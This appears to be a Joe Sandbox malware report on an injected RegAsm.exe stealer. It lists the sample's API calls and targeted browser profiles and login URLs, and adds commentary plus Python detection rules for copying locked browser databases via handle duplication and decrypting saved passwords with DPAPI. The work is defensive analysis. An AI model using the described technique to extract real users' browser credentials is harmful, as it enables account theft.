                                                                        • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                        • WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                        • CloseHandle.KERNEL32(?), ref: 0040E13E
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                        • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                        • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                        • String ID: bhv
                                                                        • API String ID: 4234240956-2689659898
                                                                        • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                        • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                        • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                        • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
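                                                                        The two listings above describe two distinct behaviours of the injected RegAsm.exe process (process 0000000F): the routine at 0040B6EF opens a file read-only (CreateFileW with dwDesiredAccess 0x80000000 = GENERIC_READ and OPEN_EXISTING), compares a prefix (presumably against the "v10" marker that Chromium has put in front of AES-GCM-encrypted password_value blobs since version 80, the AES key itself being stored DPAPI-protected in Local State) and hands data to CryptUnprotectData; the routine containing the OpenProcess call at 0040E093 first lists every handle on the system with NtQuerySystemInformation(0x10 = SystemHandleInformation), opens the owning process with PROCESS_DUP_HANDLE (0x40), duplicates the handle into itself, maps it and writes the bytes to a temp file, which is how a process copies a database that another process (a browser) holds open exclusively. The Python below is an added example and is not part of the Joe Sandbox report or of the Remcos binary: it encodes those two call sequences as ordered behavioural rules keyed on the argument values visible in the report and runs them over a constructed API trace. The event tuples, the rule names and the `triage` helper are mine; the trace is made up to mirror the calls shown, not sandbox output. The handle-duplication chain is the strong indicator; the DPAPI chain alone is noisy (plenty of legitimate software calls CryptUnprotectData), so `triage` can be asked to flag only processes that match more than one rule.

```python
"""Ordered behavioural signatures built from the API call sequences in the
report above, evaluated over a constructed per-process API trace.

Added example: the signature names, the ApiEvent shape and SAMPLE_TRACE are
assumptions of this example, not sandbox output or Remcos code.
"""
from collections import defaultdict
from typing import Callable, Dict, List, NamedTuple, Tuple


class ApiEvent(NamedTuple):
    pid: int
    api: str
    args: Tuple[int, ...] = ()


Step = Tuple[str, Callable[[Tuple[int, ...]], bool]]

# Argument constants exactly as they appear in the report's call references.
SYSTEM_HANDLE_INFORMATION = 0x10  # NtQuerySystemInformation class at 0040DE15
PROCESS_DUP_HANDLE = 0x40         # OpenProcess access mask at 0040E093
GENERIC_READ = 0x80000000         # CreateFileW access at 0040B80C


def _any(_args: Tuple[int, ...]) -> bool:
    return True


SIGNATURES: Dict[str, List[Step]] = {
    # Copy a file another process holds open exclusively: enumerate all
    # handles, duplicate the victim's handle, map it, dump it to a temp file.
    "locked_file_copy_via_handle_duplication": [
        ("NtQuerySystemInformation", lambda a: bool(a) and a[0] == SYSTEM_HANDLE_INFORMATION),
        ("OpenProcess", lambda a: bool(a) and (a[0] & PROCESS_DUP_HANDLE) != 0),
        ("DuplicateHandle", _any),
        ("CreateFileMappingW", _any),
        ("MapViewOfFile", _any),
        ("WriteFile", _any),
    ],
    # Open a file read-only and feed its contents to DPAPI. Noisy on its own,
    # so it is meant to be combined with the rule above via min_rules.
    "dpapi_decrypt_of_file_contents": [
        ("CreateFileW", lambda a: len(a) > 1 and a[1] == GENERIC_READ),
        ("CryptUnprotectData", _any),
        ("LocalFree", _any),
    ],
}


def match_sequence(events: List[ApiEvent], steps: List[Step]) -> bool:
    """Greedy ordered-subsequence match: each step must occur after the
    previous one, with any number of unrelated calls in between."""
    i = 0
    for ev in events:
        api, pred = steps[i]
        if ev.api == api and pred(ev.args):
            i += 1
            if i == len(steps):
                return True
    return False


def triage(trace: List[ApiEvent], min_rules: int = 1) -> Dict[int, List[str]]:
    """Group the trace by pid and return {pid: [matched rule names]} for every
    process that matches at least min_rules signatures."""
    by_pid: Dict[int, List[ApiEvent]] = defaultdict(list)
    for ev in trace:
        by_pid[ev.pid].append(ev)
    hits: Dict[int, List[str]] = {}
    for pid, events in by_pid.items():
        matched = [name for name, steps in SIGNATURES.items() if match_sequence(events, steps)]
        if len(matched) >= min_rules:
            hits[pid] = matched
    return hits


# Constructed trace (not captured data). pid 15 mirrors the report's process
# 0000000F; pid 7 is a benign program that also uses DPAPI and file mappings;
# pid 9 only enumerates processes with PROCESS_QUERY_INFORMATION|PROCESS_VM_READ.
SAMPLE_TRACE: List[ApiEvent] = [
    ApiEvent(15, "CreateFileW", (0, GENERIC_READ, 0, 0, 3)),   # OPEN_EXISTING
    ApiEvent(15, "memcmp"),                                    # prefix check
    ApiEvent(15, "CryptUnprotectData"),
    ApiEvent(15, "LocalFree"),
    ApiEvent(15, "NtQuerySystemInformation", (SYSTEM_HANDLE_INFORMATION,)),
    ApiEvent(15, "OpenProcess", (PROCESS_DUP_HANDLE, 0, 1234)),
    ApiEvent(15, "GetCurrentProcess"),
    ApiEvent(15, "DuplicateHandle"),
    ApiEvent(15, "GetFileSize"),
    ApiEvent(15, "GetTempFileNameW"),
    ApiEvent(15, "CreateFileMappingW"),
    ApiEvent(15, "MapViewOfFile"),
    ApiEvent(15, "WriteFile"),
    ApiEvent(15, "UnmapViewOfFile"),
    ApiEvent(7, "CreateFileW", (0, GENERIC_READ, 0, 0, 3)),
    ApiEvent(7, "CryptUnprotectData"),
    ApiEvent(7, "LocalFree"),
    ApiEvent(7, "CreateFileMappingW"),
    ApiEvent(7, "MapViewOfFile"),
    ApiEvent(7, "WriteFile"),
    ApiEvent(9, "OpenProcess", (0x410, 0, 15)),
]

if __name__ == "__main__":
    for pid, rules in triage(SAMPLE_TRACE, min_rules=2).items():
        print(f"pid {pid}: {', '.join(rules)}")
```

                                                                        To run this over real data, map each line of an API log (a sandbox trace or an API-monitor export) to ApiEvent(pid, api, args) with the integer arguments in call order; the rules only look at the argument positions they name, so extra or unknown arguments are harmless.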

                                                                        Control-flow Graph

                                                                        [Control-flow graph image for the function starting at 004466F4 (basic blocks drawn with an Executed / Not Executed legend); the graph layout data is not reproduced here.]
                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(00000000,0044E4C0,00000070), ref: 00446703
                                                                        • __set_app_type.MSVCRT ref: 00446762
                                                                        • __p__fmode.MSVCRT ref: 00446777
                                                                        • __p__commode.MSVCRT ref: 00446785
                                                                        • __setusermatherr.MSVCRT ref: 004467B1
                                                                        • _initterm.MSVCRT ref: 004467C7
                                                                        • GetEnvironmentStringsW.KERNEL32(?,?,?,?,0044E494,0044E498), ref: 004467EA
                                                                        • _initterm.MSVCRT ref: 004467FD
                                                                        • GetStartupInfoW.KERNEL32(?), ref: 0044685A
                                                                        • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00446880
                                                                        • exit.MSVCRT ref: 00446897
                                                                        • _cexit.MSVCRT ref: 0044689D
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule_initterm$EnvironmentInfoStartupStrings__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                        • String ID:
                                                                        • API String ID: 2791496988-0
                                                                        • Opcode ID: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                                                                        • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                        • Opcode Fuzzy Hash: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                                                                        • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • memset.MSVCRT ref: 0040C298
                                                                          • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                          • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                          • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                          • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                        • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                        • wcschr.MSVCRT ref: 0040C324
                                                                        • wcschr.MSVCRT ref: 0040C344
                                                                        • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                        • GetLastError.KERNEL32 ref: 0040C373
                                                                        • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                        • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                        • String ID: visited:
                                                                        • API String ID: 2470578098-1702587658
                                                                        • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                        • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                        • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                        • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                                        Control-flow Graph

                                                                        control_flow_graph 628 40e175-40e1a1 call 40695d call 406b90 633 40e1a7-40e1e5 memset 628->633 634 40e299-40e2a8 call 4069a3 628->634 636 40e1e8-40e1fa call 406e8f 633->636 640 40e270-40e27d call 406b53 636->640 641 40e1fc-40e219 call 40dd50 * 2 636->641 640->636 647 40e283-40e286 640->647 641->640 652 40e21b-40e21d 641->652 648 40e291-40e294 call 40aa04 647->648 649 40e288-40e290 ??3@YAXPAX@Z 647->649 648->634 649->648 652->640 653 40e21f-40e235 call 40742e 652->653 653->640 656 40e237-40e242 call 40aae3 653->656 656->640 659 40e244-40e26b _snwprintf call 40a8d0 656->659 659->640
                                                                        APIs
                                                                          • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                        • memset.MSVCRT ref: 0040E1BD
                                                                          • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                                          • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                          • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                          • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                        • _snwprintf.MSVCRT ref: 0040E257
                                                                          • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                          • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                          • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                          • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                        • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                        • API String ID: 3883404497-2982631422
                                                                        • Opcode ID: b421f0fbbd6ad79df9d48377ab98bfefffe95da864e54072a2f7617dfae47395
                                                                        • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                        • Opcode Fuzzy Hash: b421f0fbbd6ad79df9d48377ab98bfefffe95da864e54072a2f7617dfae47395
                                                                        • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                          • Part of subcall function 0040CC26: CloseHandle.KERNEL32(?), ref: 0040CC98
                                                                          • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                        • memset.MSVCRT ref: 0040BC75
                                                                        • memset.MSVCRT ref: 0040BC8C
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                        • memcmp.MSVCRT ref: 0040BCD6
                                                                        • memcpy.MSVCRT ref: 0040BD2B
                                                                        • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                        • String ID:
                                                                        • API String ID: 115830560-3916222277
                                                                        • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                        • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                        • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                        • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                        • String ID: r!A
                                                                        • API String ID: 2791114272-628097481
                                                                        • Opcode ID: e760b227a922d4e3f094a9eb3eb7a7fe7130a7247a75f8eef54ce2a40c46c596
                                                                        • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                        • Opcode Fuzzy Hash: e760b227a922d4e3f094a9eb3eb7a7fe7130a7247a75f8eef54ce2a40c46c596
                                                                        • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                                          • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                                          • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                                          • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                          • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                          • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                          • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                          • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                          • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                          • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                          • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                          • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                          • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                          • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                        • _wcslwr.MSVCRT ref: 0040C817
                                                                          • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                          • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                        • wcslen.MSVCRT ref: 0040C82C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                        • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                        • API String ID: 62308376-4196376884
                                                                        • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                        • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                        • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                        • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D

                                                                        Control-flow Graph

                                                                        control_flow_graph 770 40b58d-40b59e 771 40b5a4-40b5c0 GetModuleHandleW FindResourceW 770->771 772 40b62e-40b632 770->772 773 40b5c2-40b5ce LoadResource 771->773 774 40b5e7 771->774 773->774 775 40b5d0-40b5e5 SizeofResource LockResource 773->775 776 40b5e9-40b5eb 774->776 775->776 776->772 777 40b5ed-40b5ef 776->777 777->772 778 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b 777->778 778->772
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                        • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                        • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                        • memcpy.MSVCRT ref: 0040B60D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                        • String ID: BIN
                                                                        • API String ID: 1668488027-1015027815
                                                                        • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                        • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                        • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                        • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • memset.MSVCRT ref: 00403CBF
                                                                        • memset.MSVCRT ref: 00403CD4
                                                                        • memset.MSVCRT ref: 00403CE9
                                                                        • memset.MSVCRT ref: 00403CFE
                                                                        • memset.MSVCRT ref: 00403D13
                                                                          • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                          • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                          • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                          • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                          • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                        • memset.MSVCRT ref: 00403DDA
                                                                          • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                          • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                        • String ID: Waterfox$Waterfox\Profiles
                                                                        • API String ID: 4039892925-11920434
                                                                        • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                        • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                        • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                        • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • memset.MSVCRT ref: 00403E50
                                                                        • memset.MSVCRT ref: 00403E65
                                                                        • memset.MSVCRT ref: 00403E7A
                                                                        • memset.MSVCRT ref: 00403E8F
                                                                        • memset.MSVCRT ref: 00403EA4
                                                                          • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                          • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                          • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                          • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                          • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                        • memset.MSVCRT ref: 00403F6B
                                                                          • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                          • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                        • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                        • API String ID: 4039892925-2068335096
                                                                        • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                        • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                        • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                        • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                        APIs
                                                                        • memset.MSVCRT ref: 00403FE1
                                                                        • memset.MSVCRT ref: 00403FF6
                                                                        • memset.MSVCRT ref: 0040400B
                                                                        • memset.MSVCRT ref: 00404020
                                                                        • memset.MSVCRT ref: 00404035
                                                                          • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                          • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                          • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                          • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                          • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                        • memset.MSVCRT ref: 004040FC
                                                                          • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                          • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                        • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                        • API String ID: 4039892925-3369679110
                                                                        • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                        • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                        • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                        • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memcpy
                                                                        • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                        • API String ID: 3510742995-2641926074
                                                                        • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
